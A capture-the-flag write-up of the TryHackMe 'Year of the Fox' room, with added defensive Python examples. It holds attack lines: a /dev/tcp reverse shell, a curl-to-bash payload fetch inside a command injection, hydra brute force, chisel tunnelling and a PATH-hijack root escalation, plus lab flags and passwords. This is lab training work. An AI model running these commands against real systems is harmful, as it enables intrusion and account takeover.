
Year of the Fox

TryHackMe Linux Hard

Enumeration

Let's start with the port scan.

PORT    STATE SERVICE      REASON
80/tcp  open  http         syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

Let's enumerate SMB.

But access is denied.

Listing users with nxc, we can see the user fox.

nxc smb 10.10.54.212 --users

So we got the username fox. Let's try a password spray.

nxc smb 10.10.54.212 -u fox -p /usr/share/wordlists/rockyou.txt

I tried password spraying but it didn't work.

After some time, it worked.

Hmm, so the password is abcdefg. Really? Really?

Okay.

Let's see what we got.

We can decrypt it.

5c8d7f5eaa6208803b7866d9cbf0ea8a30198a2f8f4426cbe5a4267b272e90a8
716be5b5c8943800c7be592cce374a22be2d7376a263b01791f3fb09182ad284

Let's see. I spent lots of time figuring out what it is. I took a small hint.

There is also another user. We can run enum4linux.

enum4linux -a 10.10.54.212

Exploit

And we got another user, rascal. I tried that user on port 80, but we also need a password. Let's try hydra.

hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.54.212 http-get /

And we got the password.

angel17

Let's log in.

Hmmm, interesting.

What can we do here? Hmm, we might read files, get RCE, or something like that. Again I was stuck, so I took help from a writeup for the command injection payload.

\";pwd \"

So it worked.

Hmm, let's try to get a reverse shell. But something is very odd. Doing this, we got the ping.

Let's try again to get a reverse shell. It was fully blind; some things were working and some were not.
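Why `\";pwd \"` worked: once the JSON escaping is removed the field is `";pwd "`, which closes a double-quoted shell argument and starts a second command. The following is an added example of my own, not code from the room or from the original post: a hypothetical handler in the shape the payload implies, with `printf` standing in for the network command so it runs offline, beside a hardened version that validates the value against a hostname allow-list and passes an argument vector with no shell at all.

```python
import re
import subprocess

# Hypothetical handler in the shape the room's payload implies (assumed, not the
# real application): the "target" field is spliced into a shell command line.
# printf stands in for the real network command so this runs offline; the defect
# is the string interpolation plus shell=True, not the command being wrapped.
def vulnerable_lookup(target: str) -> str:
    cmd = f'printf "%s\\n" "{target}"'   # a target of ";pwd " closes the quotes, then ; starts pwd
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout

# Hostname / IPv4 allow-list: letters, digits, dots and hyphens only, so shell
# metacharacters such as " ; | & $ ` are rejected before anything is executed.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

def safe_lookup(target: str) -> str:
    if not HOST_RE.fullmatch(target):
        raise ValueError(f"rejected target: {target!r}")
    # argv list and no shell: the value is exactly one argument and is never re-parsed.
    proc = subprocess.run(["printf", "%s\n", target], capture_output=True, text=True)
    return proc.stdout

def injected_command_ran(output: str) -> bool:
    """True when the output holds more than the single echoed line (i.e. pwd's output)."""
    return len(output.splitlines()) > 1

if __name__ == "__main__":
    payload = '";pwd "'   # the room's payload once the JSON escaping is removed
    out = vulnerable_lookup(payload)
    print("vulnerable output:", repr(out))
    print("extra command ran:", injected_command_ran(out))
    try:
        safe_lookup(payload)
    except ValueError as exc:
        print("hardened:", exc)
    print("hardened, legitimate input:", repr(safe_lookup("10.10.54.212")))
```

The allow-list is the real fix; the argv form is the belt to its braces, because even a validated value should never reach a shell parser. On the detection side, a web server child process spawning `sh -c` with quote characters in its arguments is the thing to alert on.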

Foothold

Let's first make a script like this, which will give us the reverse shell.

#!/bin/bash
sh -i >& /dev/tcp/ip/9999 0>&1

Now we are going to serve it with a Python 3 web server using this command.

python3 -m http.server 8000

And we are going to use curl to fetch it and pipe it into bash with |.

curl http://tun0:8000/shell.sh | bash
{"target":"\";curl http://ip:8000/shell.sh | bash\n"}

Now we should have our shell in our listener.

Let's get a TTY shell and try to escalate our privileges. We can also see the web flag. THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw}

Privilege Escalation

Let's run linpeas.sh. Now I have many questions here: 1. What were those SMB files meant for? 2. What's with user fox? And many more.

Hmm, let's continue. Again I tried many things but nothing worked, and interestingly:

We don't even have permission to su.

Again, after trying for several minutes, I took help from a writeup: there is an internal SSH port running.

Uff. Okay, let's see. Let's try SSH as user rascal with the password from before. Everything is denied.

Let's forward this port to our machine. For that, first download chisel from this

On your local machine:

chisel server -p 9001 --reverse

And this on the victim's machine:

./chisel client ip:9001 R:2222:127.0.0.1:22

So what it does is: the first command listens on port 9001 for a reverse connection from the chisel client, which is how the victim's port gets exposed, and the second command connects to our listener and forwards the victim's port 22 to port 2222 on our host.

And now we can SSH.

But the password? I tried the password of user rascal, but it wasn't working.

Hmm, again after trying to find the password for a few minutes, I found out we need to use hydra (obviously from the writeup). Let's use that. I ran this command for a second.

hydra -l fox -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1 -s 2222

And we got the password.
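From the defender's side, a run like the hydra one above leaves a burst of `Failed password` records in sshd's log, and because it came through the chisel tunnel the source address is 127.0.0.1, not the attacker's host. Here is an added detection example of my own (not from the room or the original post) that runs over a constructed auth.log sample: it counts failures per (user, source) pair in a sliding window and then looks for an `Accepted password` from the same pair, which is the signal that the guessing succeeded. The hostname `yotf`, the PIDs, ports and the address 10.9.1.7 are all constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample of sshd records in auth.log syslog format (not from the room):
# twelve failures for fox in eleven seconds, the "Accepted" that ends the run, and one
# unrelated failure for rascal from another address.
SAMPLE_AUTH_LOG = [
    f"Jun 14 10:02:{s:02d} yotf sshd[{1200 + s}]: Failed password for fox "
    f"from 127.0.0.1 port {45200 + s} ssh2"
    for s in range(1, 13)
] + [
    "Jun 14 10:02:13 yotf sshd[1213]: Accepted password for fox from 127.0.0.1 port 45213 ssh2",
    "Jun 14 10:05:40 yotf sshd[1300]: Failed password for invalid user rascal from 10.9.1.7 port 50011 ssh2",
]

AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)

Event = Tuple[datetime, str, str, str]  # (time, result, user, source)

def parse_auth(lines: List[str]) -> List[Event]:
    """Pull (time, result, user, source) out of sshd password-auth lines; other lines are skipped."""
    events = []
    for line in lines:
        m = AUTH_RE.match(line)
        if m:
            # syslog timestamps carry no year; strptime fills in 1900, which is fine for ordering
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events

def detect_bruteforce(lines: List[str], threshold: int = 10,
                      window: timedelta = timedelta(seconds=60)) -> List[Tuple[str, str]]:
    """(user, src) pairs with at least `threshold` failures inside any span of length `window`."""
    times: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for ts, result, user, src in parse_auth(lines):
        if result == "Failed":
            times[(user, src)].append(ts)
    alerts = []
    for key, stamps in times.items():
        stamps.sort()
        lo = 0
        for hi in range(len(stamps)):           # sliding window over sorted timestamps
            while stamps[hi] - stamps[lo] > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                alerts.append(key)
                break
    return sorted(alerts)

def guessed_logins(lines: List[str], **kw) -> List[Tuple[str, str]]:
    """Brute-forced (user, src) pairs that also have an 'Accepted password': likely compromise."""
    flagged = set(detect_bruteforce(lines, **kw))
    hits = {(user, src) for _, result, user, src in parse_auth(lines)
            if result == "Accepted" and (user, src) in flagged}
    return sorted(hits)

if __name__ == "__main__":
    print("brute force:", detect_bruteforce(SAMPLE_AUTH_LOG))
    print("guessed logins:", guessed_logins(SAMPLE_AUTH_LOG))
```

The loopback source is the caveat worth remembering: per-address controls that exempt localhost (fail2ban's default `ignoreip` covers 127.0.0.1/8) will not react to a tunnelled brute force, and binding sshd to loopback only reduces exposure until someone has a local shell. That is why the detector keys on the (user, source) failure count and treats an `Accepted` right after a burst as the high-value alert.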

Let's SSH as fox with the password elijah.

Hmm, now we need to become root, I guess. We also got the user flag. THM{Njg3NWZhNDBjMmNlMzNkMGZmMDBhYjhk}

Let's escalate our privileges to root. Running sudo -l, we can see that we can run /usr/sbin/shutdown as root.

Hmm, let's see how we can exploit this. We don't have permission to do anything else.

Can we change the PATH variable? Let's see. Let's do this.

export PATH="/tmp:$PATH"

And it worked.

So now we can create a fake shutdown in /tmp. I made a shutdown containing this.

#!/bin/bash
chmod 4777 /bin/bash
echo "Done."

So when we run shutdown, it should run our shutdown instead of the real one. But first, let's give our shutdown executable permission.

chmod 777 /tmp/shutdown

But it didn't work. Let's look at that shutdown executable.

Hmm, it's using poweroff. Let's look at that executable.

Ohh, what if instead of shutdown we create a poweroff? Let's just copy /bin/bash to /tmp/poweroff.

Now let's give it the right permissions and run shutdown with sudo.

And we became root. Let's get the flag. Hmmm.
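The reason the fake shutdown failed and the fake poweroff worked is PATH lookup: the sudo rule names /usr/sbin/shutdown by absolute path, so PATH never decides which shutdown runs, but shutdown calls poweroff by bare name, and that call is resolved through the PATH the sudo session kept. The added example below is mine, not code from the room: it emulates that lookup against a constructed fake filesystem, lists which PATH entries ahead of the real binary an unprivileged user could populate, and shows that sudo's `secure_path` (the value shipped in Debian-style sudoers is used here; check your own /etc/sudoers) takes /tmp out of the search entirely. The live helper at the end runs the same check against the real PATH of whoever executes it.

```python
import os
from typing import Iterable, List, Optional

# secure_path as shipped in Debian-style /etc/sudoers (assumed default; verify on your host).
# When sudo resets PATH to this, /tmp is simply never searched by the child process.
SUDO_SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed fake filesystem for the demo: absolute paths that exist and are executable.
FAKE_FS = {"/usr/sbin/shutdown", "/usr/sbin/poweroff", "/tmp/poweroff", "/tmp/shutdown"}

def resolve_command(name: str, path: str, executables: Iterable[str]) -> Optional[str]:
    """Emulate the PATH search a bare command name goes through: first entry, in order,
    that holds an executable called `name`. An empty entry means the current directory."""
    present = set(executables)
    for entry in path.split(":"):
        candidate = os.path.join(entry or ".", name)
        if candidate in present:
            return candidate
    return None

def hijackable_entries(path: str, real_dir: str, writable_dirs: Iterable[str]) -> List[str]:
    """PATH entries searched before `real_dir` that the caller could write into. Anything
    listed here can shadow a helper the privileged program invokes by bare name."""
    writable = set(writable_dirs)
    risky = []
    for entry in path.split(":"):
        if entry == real_dir:
            break
        if entry == "" or entry in writable:
            risky.append(entry or "(empty entry = cwd)")
    return risky

def writable_entries_on_this_host(path: Optional[str] = None) -> List[str]:
    """Live audit: PATH directories the current user can write to (os.access check)."""
    path = os.environ.get("PATH", "") if path is None else path
    return [d for d in path.split(":") if d == "" or os.access(d, os.W_OK)]

if __name__ == "__main__":
    user_path = "/tmp:/usr/local/bin:/usr/bin:/usr/sbin"   # what the room's export produced
    print("shutdown via sudo is /usr/sbin/shutdown regardless of PATH")
    print("poweroff with /tmp first  :", resolve_command("poweroff", user_path, FAKE_FS))
    print("poweroff under secure_path:", resolve_command("poweroff", SUDO_SECURE_PATH, FAKE_FS))
    print("hijackable before /usr/sbin:", hijackable_entries(user_path, "/usr/sbin", {"/tmp"}))
    print("writable PATH dirs here    :", writable_entries_on_this_host())
```

Two fixes follow from the emulation: keep `Defaults env_reset` and `secure_path` in sudoers so a user-supplied PATH never survives into the root process, and have privileged wrappers call their helpers by absolute path (/usr/sbin/poweroff) so there is no lookup to hijack in the first place. A sudo rule for a program that shells out by bare name is the pattern to hunt for in a sudoers review.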

Let's search for the root flag.

find / -type f -name "*root*" 2>/dev/null

And we got it.

Hmm, let's read that.

But what is that base64 thing? It gives us hash-like strings after decoding, like what we got before in creds.txt and cipher.txt. Hmmm.

Done

And done.

Again I learned lots of things. I hope you are doing great. Take care :).